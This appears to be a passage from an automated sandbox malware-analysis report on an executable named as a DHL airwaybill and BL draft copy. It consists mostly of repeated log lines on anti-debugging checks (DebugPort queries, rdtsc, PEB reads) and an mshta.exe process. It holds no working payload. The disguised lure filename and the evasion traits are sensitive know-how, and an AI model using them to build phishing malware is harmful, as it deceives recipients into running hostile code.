            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\mshta.exeProcess queried: DebugPortJump to behavior
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B4096E rdtsc 3_2_01B4096E
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_00417533 LdrLoadDll,3_2_00417533
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B8019F mov eax, dword ptr fs:[00000030h]3_2_01B8019F
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B8019F mov eax, dword ptr fs:[00000030h]3_2_01B8019F
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B8019F mov eax, dword ptr fs:[00000030h]3_2_01B8019F
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B8019F mov eax, dword ptr fs:[00000030h]3_2_01B8019F
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B40185 mov eax, dword ptr fs:[00000030h]3_2_01B40185
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01BBC188 mov eax, dword ptr fs:[00000030h]3_2_01BBC188
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01BBC188 mov eax, dword ptr fs:[00000030h]3_2_01BBC188
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01AFA197 mov eax, dword ptr fs:[00000030h]3_2_01AFA197
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01AFA197 mov eax, dword ptr fs:[00000030h]3_2_01AFA197
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01AFA197 mov eax, dword ptr fs:[00000030h]3_2_01AFA197
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01BA4180 mov eax, dword ptr fs:[00000030h]3_2_01BA4180
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01BA4180 mov eax, dword ptr fs:[00000030h]3_2_01BA4180
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B301F8 mov eax, dword ptr fs:[00000030h]3_2_01B301F8
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01BD61E5 mov eax, dword ptr fs:[00000030h]3_2_01BD61E5
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B7E1D0 mov eax, dword ptr fs:[00000030h]3_2_01B7E1D0
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B7E1D0 mov eax, dword ptr fs:[00000030h]3_2_01B7E1D0
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B7E1D0 mov ecx, dword ptr fs:[00000030h]3_2_01B7E1D0
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B7E1D0 mov eax, dword ptr fs:[00000030h]3_2_01B7E1D0
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B7E1D0 mov eax, dword ptr fs:[00000030h]3_2_01B7E1D0
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01BC61C3 mov eax, dword ptr fs:[00000030h]3_2_01BC61C3
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01BC61C3 mov eax, dword ptr fs:[00000030h]3_2_01BC61C3
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B30124 mov eax, dword ptr fs:[00000030h]3_2_01B30124
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01BAA118 mov ecx, dword ptr fs:[00000030h]3_2_01BAA118
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01BAA118 mov eax, dword ptr fs:[00000030h]3_2_01BAA118
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01BAA118 mov eax, dword ptr fs:[00000030h]3_2_01BAA118
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01BAA118 mov eax, dword ptr fs:[00000030h]3_2_01BAA118
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01BC0115 mov eax, dword ptr fs:[00000030h]3_2_01BC0115
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01BAE10E mov eax, dword ptr fs:[00000030h]3_2_01BAE10E
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01BAE10E mov ecx, dword ptr fs:[00000030h]3_2_01BAE10E
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01BAE10E mov eax, dword ptr fs:[00000030h]3_2_01BAE10E
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01BAE10E mov eax, dword ptr fs:[00000030h]3_2_01BAE10E
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01BAE10E mov ecx, dword ptr fs:[00000030h]3_2_01BAE10E
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01BAE10E mov eax, dword ptr fs:[00000030h]3_2_01BAE10E
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01BAE10E mov eax, dword ptr fs:[00000030h]3_2_01BAE10E
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01BAE10E mov ecx, dword ptr fs:[00000030h]3_2_01BAE10E
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01BAE10E mov eax, dword ptr fs:[00000030h]3_2_01BAE10E
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01BAE10E mov ecx, dword ptr fs:[00000030h]3_2_01BAE10E
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01BD4164 mov eax, dword ptr fs:[00000030h]3_2_01BD4164
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01BD4164 mov eax, dword ptr fs:[00000030h]3_2_01BD4164
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B98158 mov eax, dword ptr fs:[00000030h]3_2_01B98158
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B06154 mov eax, dword ptr fs:[00000030h]3_2_01B06154
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B06154 mov eax, dword ptr fs:[00000030h]3_2_01B06154
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01AFC156 mov eax, dword ptr fs:[00000030h]3_2_01AFC156
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B94144 mov eax, dword ptr fs:[00000030h]3_2_01B94144
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B94144 mov eax, dword ptr fs:[00000030h]3_2_01B94144
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B94144 mov ecx, dword ptr fs:[00000030h]3_2_01B94144
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B94144 mov eax, dword ptr fs:[00000030h]3_2_01B94144
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B94144 mov eax, dword ptr fs:[00000030h]3_2_01B94144
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01BC60B8 mov eax, dword ptr fs:[00000030h]3_2_01BC60B8
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01BC60B8 mov ecx, dword ptr fs:[00000030h]3_2_01BC60B8
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01AF80A0 mov eax, dword ptr fs:[00000030h]3_2_01AF80A0
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B980A8 mov eax, dword ptr fs:[00000030h]3_2_01B980A8
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B0208A mov eax, dword ptr fs:[00000030h]3_2_01B0208A
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B420F0 mov ecx, dword ptr fs:[00000030h]3_2_01B420F0
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01AFA0E3 mov ecx, dword ptr fs:[00000030h]3_2_01AFA0E3
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B860E0 mov eax, dword ptr fs:[00000030h]3_2_01B860E0
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B080E9 mov eax, dword ptr fs:[00000030h]3_2_01B080E9
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01AFC0F0 mov eax, dword ptr fs:[00000030h]3_2_01AFC0F0
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B820DE mov eax, dword ptr fs:[00000030h]3_2_01B820DE
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B96030 mov eax, dword ptr fs:[00000030h]3_2_01B96030
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01AFA020 mov eax, dword ptr fs:[00000030h]3_2_01AFA020
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01AFC020 mov eax, dword ptr fs:[00000030h]3_2_01AFC020
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B1E016 mov eax, dword ptr fs:[00000030h]3_2_01B1E016
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B1E016 mov eax, dword ptr fs:[00000030h]3_2_01B1E016
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B1E016 mov eax, dword ptr fs:[00000030h]3_2_01B1E016
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B1E016 mov eax, dword ptr fs:[00000030h]3_2_01B1E016
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B84000 mov ecx, dword ptr fs:[00000030h]3_2_01B84000
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01BA2000 mov eax, dword ptr fs:[00000030h]3_2_01BA2000
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01BA2000 mov eax, dword ptr fs:[00000030h]3_2_01BA2000
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01BA2000 mov eax, dword ptr fs:[00000030h]3_2_01BA2000
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01BA2000 mov eax, dword ptr fs:[00000030h]3_2_01BA2000
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01BA2000 mov eax, dword ptr fs:[00000030h]3_2_01BA2000
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01BA2000 mov eax, dword ptr fs:[00000030h]3_2_01BA2000
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01BA2000 mov eax, dword ptr fs:[00000030h]3_2_01BA2000
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01BA2000 mov eax, dword ptr fs:[00000030h]3_2_01BA2000
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B2C073 mov eax, dword ptr fs:[00000030h]3_2_01B2C073
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B02050 mov eax, dword ptr fs:[00000030h]3_2_01B02050
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B86050 mov eax, dword ptr fs:[00000030h]3_2_01B86050
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01AFE388 mov eax, dword ptr fs:[00000030h]3_2_01AFE388
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01AFE388 mov eax, dword ptr fs:[00000030h]3_2_01AFE388
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01AFE388 mov eax, dword ptr fs:[00000030h]3_2_01AFE388
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01AF8397 mov eax, dword ptr fs:[00000030h]3_2_01AF8397
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01AF8397 mov eax, dword ptr fs:[00000030h]3_2_01AF8397
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01AF8397 mov eax, dword ptr fs:[00000030h]3_2_01AF8397
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B2438F mov eax, dword ptr fs:[00000030h]3_2_01B2438F
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B2438F mov eax, dword ptr fs:[00000030h]3_2_01B2438F
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B1E3F0 mov eax, dword ptr fs:[00000030h]3_2_01B1E3F0
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B1E3F0 mov eax, dword ptr fs:[00000030h]3_2_01B1E3F0
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B1E3F0 mov eax, dword ptr fs:[00000030h]3_2_01B1E3F0
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B363FF mov eax, dword ptr fs:[00000030h]3_2_01B363FF
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B103E9 mov eax, dword ptr fs:[00000030h]3_2_01B103E9
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B103E9 mov eax, dword ptr fs:[00000030h]3_2_01B103E9
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B103E9 mov eax, dword ptr fs:[00000030h]3_2_01B103E9
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B103E9 mov eax, dword ptr fs:[00000030h]3_2_01B103E9
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B103E9 mov eax, dword ptr fs:[00000030h]3_2_01B103E9
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B103E9 mov eax, dword ptr fs:[00000030h]3_2_01B103E9
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B103E9 mov eax, dword ptr fs:[00000030h]3_2_01B103E9
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B103E9 mov eax, dword ptr fs:[00000030h]3_2_01B103E9
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01BAE3DB mov eax, dword ptr fs:[00000030h]3_2_01BAE3DB
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01BAE3DB mov eax, dword ptr fs:[00000030h]3_2_01BAE3DB
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01BAE3DB mov ecx, dword ptr fs:[00000030h]3_2_01BAE3DB
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01BAE3DB mov eax, dword ptr fs:[00000030h]3_2_01BAE3DB
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01BA43D4 mov eax, dword ptr fs:[00000030h]3_2_01BA43D4
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01BA43D4 mov eax, dword ptr fs:[00000030h]3_2_01BA43D4
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B0A3C0 mov eax, dword ptr fs:[00000030h]3_2_01B0A3C0
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B0A3C0 mov eax, dword ptr fs:[00000030h]3_2_01B0A3C0
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B0A3C0 mov eax, dword ptr fs:[00000030h]3_2_01B0A3C0
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B0A3C0 mov eax, dword ptr fs:[00000030h]3_2_01B0A3C0
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B0A3C0 mov eax, dword ptr fs:[00000030h]3_2_01B0A3C0
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B0A3C0 mov eax, dword ptr fs:[00000030h]3_2_01B0A3C0
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B083C0 mov eax, dword ptr fs:[00000030h]3_2_01B083C0
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B083C0 mov eax, dword ptr fs:[00000030h]3_2_01B083C0
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B083C0 mov eax, dword ptr fs:[00000030h]3_2_01B083C0
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B083C0 mov eax, dword ptr fs:[00000030h]3_2_01B083C0
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01BBC3CD mov eax, dword ptr fs:[00000030h]3_2_01BBC3CD
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B863C0 mov eax, dword ptr fs:[00000030h]3_2_01B863C0
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01BD8324 mov eax, dword ptr fs:[00000030h]3_2_01BD8324
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01BD8324 mov ecx, dword ptr fs:[00000030h]3_2_01BD8324
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01BD8324 mov eax, dword ptr fs:[00000030h]3_2_01BD8324
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01BD8324 mov eax, dword ptr fs:[00000030h]3_2_01BD8324
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B20310 mov ecx, dword ptr fs:[00000030h]3_2_01B20310
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B3A30B mov eax, dword ptr fs:[00000030h]3_2_01B3A30B
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B3A30B mov eax, dword ptr fs:[00000030h]3_2_01B3A30B
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B3A30B mov eax, dword ptr fs:[00000030h]3_2_01B3A30B
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01AFC310 mov ecx, dword ptr fs:[00000030h]3_2_01AFC310
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01BA437C mov eax, dword ptr fs:[00000030h]3_2_01BA437C
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B8035C mov eax, dword ptr fs:[00000030h]3_2_01B8035C
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B8035C mov eax, dword ptr fs:[00000030h]3_2_01B8035C
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B8035C mov eax, dword ptr fs:[00000030h]3_2_01B8035C
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B8035C mov ecx, dword ptr fs:[00000030h]3_2_01B8035C
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B8035C mov eax, dword ptr fs:[00000030h]3_2_01B8035C
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B8035C mov eax, dword ptr fs:[00000030h]3_2_01B8035C
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01BA8350 mov ecx, dword ptr fs:[00000030h]3_2_01BA8350
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01BCA352 mov eax, dword ptr fs:[00000030h]3_2_01BCA352
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B82349 mov eax, dword ptr fs:[00000030h]3_2_01B82349
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B82349 mov eax, dword ptr fs:[00000030h]3_2_01B82349
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B82349 mov eax, dword ptr fs:[00000030h]3_2_01B82349
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B82349 mov eax, dword ptr fs:[00000030h]3_2_01B82349
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B82349 mov eax, dword ptr fs:[00000030h]3_2_01B82349
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B82349 mov eax, dword ptr fs:[00000030h]3_2_01B82349
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B82349 mov eax, dword ptr fs:[00000030h]3_2_01B82349
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B82349 mov eax, dword ptr fs:[00000030h]3_2_01B82349
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B82349 mov eax, dword ptr fs:[00000030h]3_2_01B82349
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B82349 mov eax, dword ptr fs:[00000030h]3_2_01B82349
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B82349 mov eax, dword ptr fs:[00000030h]3_2_01B82349
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B82349 mov eax, dword ptr fs:[00000030h]3_2_01B82349
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B82349 mov eax, dword ptr fs:[00000030h]3_2_01B82349
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B82349 mov eax, dword ptr fs:[00000030h]3_2_01B82349
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B82349 mov eax, dword ptr fs:[00000030h]3_2_01B82349
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01BD634F mov eax, dword ptr fs:[00000030h]3_2_01BD634F
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B962A0 mov eax, dword ptr fs:[00000030h]3_2_01B962A0
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B962A0 mov ecx, dword ptr fs:[00000030h]3_2_01B962A0
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B962A0 mov eax, dword ptr fs:[00000030h]3_2_01B962A0
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B962A0 mov eax, dword ptr fs:[00000030h]3_2_01B962A0
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B962A0 mov eax, dword ptr fs:[00000030h]3_2_01B962A0
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B962A0 mov eax, dword ptr fs:[00000030h]3_2_01B962A0
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B3E284 mov eax, dword ptr fs:[00000030h]3_2_01B3E284
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B3E284 mov eax, dword ptr fs:[00000030h]3_2_01B3E284
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B80283 mov eax, dword ptr fs:[00000030h]3_2_01B80283
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B80283 mov eax, dword ptr fs:[00000030h]3_2_01B80283
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B80283 mov eax, dword ptr fs:[00000030h]3_2_01B80283
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B102E1 mov eax, dword ptr fs:[00000030h]3_2_01B102E1
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B102E1 mov eax, dword ptr fs:[00000030h]3_2_01B102E1
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B102E1 mov eax, dword ptr fs:[00000030h]3_2_01B102E1
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01BD62D6 mov eax, dword ptr fs:[00000030h]3_2_01BD62D6
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B0A2C3 mov eax, dword ptr fs:[00000030h]3_2_01B0A2C3
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B0A2C3 mov eax, dword ptr fs:[00000030h]3_2_01B0A2C3
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B0A2C3 mov eax, dword ptr fs:[00000030h]3_2_01B0A2C3
